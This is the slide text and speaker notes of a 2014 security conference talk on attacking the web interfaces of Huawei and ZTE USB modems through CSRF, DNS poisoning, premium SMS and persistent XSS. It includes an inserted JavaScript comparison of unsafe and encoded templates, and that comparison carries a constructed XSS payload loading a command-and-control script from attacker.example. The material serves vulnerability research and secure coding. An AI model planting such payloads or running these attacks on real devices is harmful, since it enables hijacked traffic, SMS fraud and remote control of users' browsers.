9. Previous research
• Nikita Tarakanov & Oleg Kupreev
– From China With Love (Black Hat EU 2013)
• Rahul Sasi
– SMS to Meterpreter – Fuzzing USB Modems (Nullcon Goa 2013)
10. Scope
• Devices from the two biggest vendors*
– Huawei
– ZTE
• Focus on one device from each
– Huawei E3276
– ZTE MF821D
• Identify common attack surface
*Combined market share of more than 80% in 2011 (www.strategyanalytics.com)
11. In a nutshell
• Runs embedded Linux
• Mobile capabilities
– GSM, 3G, 4G, SMS
• Web interface
– Part of carrier branding
• No authentication
– Single-user device
19. DNS poisoning
• CSRF to add a new profile
• Static DNS servers
• Mark the new profile Read Only and set it as Default
• Remove original profile
• Send user to ad-networks, malware sites, spoofed websites, etc.
20. DNS poisoning - bonus attack
• Trigger firmware update
• Spoof update server
– Downloads are over HTTP
– No code signing
• Potentially get user to install backdoored firmware...
24. CSRF to SMS
• CSRF to make the modem send SMS
– Send to premium rate number
• Potentially identify the user
– Look up phone number
– Twin cards
• Useful in targeted phishing attacks
28. Getting persistent
• The web interface is where you go to connect to the Internet
– Huawei Hilink opens main page automatically
– ZTE creates a desktop shortcut
• The main page sets everything up
– Loads an iframe for user interaction
– It also loads the chosen language
30. Getting persistent
• Execute code every time the user connects to the Internet
• Interact with injected code
• Command channel
– Poll remote server (BeEF style)
– Out of band over SMS
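Slides 28 and 30, together with the notes (settings loaded into JavaScript variables, saved on the device, persistent XSS), describe the sink: the main page writes a stored setting such as the language straight into a script, so a value planted through the unauthenticated interface runs every time the user opens the page to connect. This is an added example, not the devices' page code: the unsafe template beside a rendering that encodes the value so that it can only ever be a string literal. The variable name is assumed and the payload is constructed.

```javascript
// Vulnerable page template: the stored setting is pasted into the script.
// Once an attacker has written a crafted value into the device (no auth,
// CSRF), this executes on every visit.
function renderLangScriptVulnerable(language) {
  return `<script>var language = "${language}";</script>`;
}

// Encode a value as a JavaScript string literal that is safe inside a
// <script> block. JSON.stringify handles quotes, backslashes and control
// characters; the extra replacements stop "</script>" or "<!--" inside the
// data from being seen by the HTML parser, which does not understand JS escapes.
function jsStringLiteral(value) {
  return JSON.stringify(String(value))
    .replace(/</g, '\\u003c')
    .replace(/>/g, '\\u003e')
    .replace(/&/g, '\\u0026')
    .replace(/\u2028/g, '\\u2028')
    .replace(/\u2029/g, '\\u2029');
}

function renderLangScriptSafe(language) {
  return `<script>var language = ${jsStringLiteral(language)};</script>`;
}

// Constructed value an attacker might store as the "language" setting. The
// first quote closes the literal, the tag closes the script, and what
// follows loads code that stays resident in the page (the polling command
// channel of slide 30 would live at that URL, which is hypothetical).
const storedPayload =
  'en";</script><script src="http://attacker.example/c2.js"></script><script>var pad="';

// Count the <script ...> start tags the HTML parser would see.
function scriptTagCount(html) {
  return (html.match(/<script\b/gi) || []).length;
}

// The safe encoding must still yield the original value once the script runs.
function roundTrips(value) {
  return JSON.parse(jsStringLiteral(value)) === String(value);
}

function compare() {
  return {
    vulnerableTags: scriptTagCount(renderLangScriptVulnerable(storedPayload)),
    safeTags: scriptTagCount(renderLangScriptSafe(storedPayload)),
    safeRoundTrips: roundTrips(storedPayload),
  };
}
```

Encoding at the sink is what removes the persistence: the planted value is still stored on the device, but it can no longer become code. Validating the setting on write (a language code is a short allow-listed string) is the second layer and is cheap to add.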
33. What to expect
• Attacks on configuration
– Network
– Mobile
• Abuse of functionality
– Outbound & inbound SMS
• Injection attacks
– Getting persistent
– Stealing information
34. Getting it fixed
• ZTE is “working on it”
– I have no details
– ZTE does not seem to have a product security team
• Huawei is fixing their entire product line
– Nice++
– Huawei has a product security team
• Sounds pretty good though, right?
35. The update model is broken
• Vendors cannot push fixes directly to end-users
– Branding complicates things
• Vendor -> Carrier -> User
– Carriers might not make the fix available
– Users might not install the fix
• Most existing devices will probably never get patched
39. Thank you for listening!
Andreas Lindh, @addelindh, Black Hat USA 2014
Editor's Notes
Path of least resistance – attackers love this
By using this logic, we’re going to take a look at some practical attacks that are likely to happen in the real world
Simply because they are not hard to execute and they have great potential for paying off
Popular - Huawei and ZTE own the market
Common attack vectors for this kind of device
Not about specific vulnerabilities in specific devices (even though examples), more about what type of attacks we can expect as a whole
Like a phone; sim, phone number, etc.
A number of different Denial of Service attacks are possible
Out of scope as they don’t meet our objectives
First thing I did was go looking for a way to change the network configuration
Not very much for the user to fill out
Configuration hidden from the user
SCA = service center address, the phone number of the carrier's Short Message Service Center
Devices have a number of configuration options – set language, enable or disable roaming, auto connect
Go to certain pages, loaded as content in JavaScript variables
Settings are saved in the device – persistent XSS
Attacks on configuration, especially network but SMS is not out of the question
The SMS functionality is bound to be, and probably already is, abused
Injection attacks for persistence and stealing info from the actual device
Attacks not possible without the web interface
Web is easy – to implement and to use, but also to attack
Web is hard – hard to secure, terrible track record at securing web, especially in the embedded space
IoT – lots of embedded devices with web interfaces and vulns like these – research, report to vendors, report to the public
Don’t forget to research the easy stuff too because that’s where attackers will focus their efforts first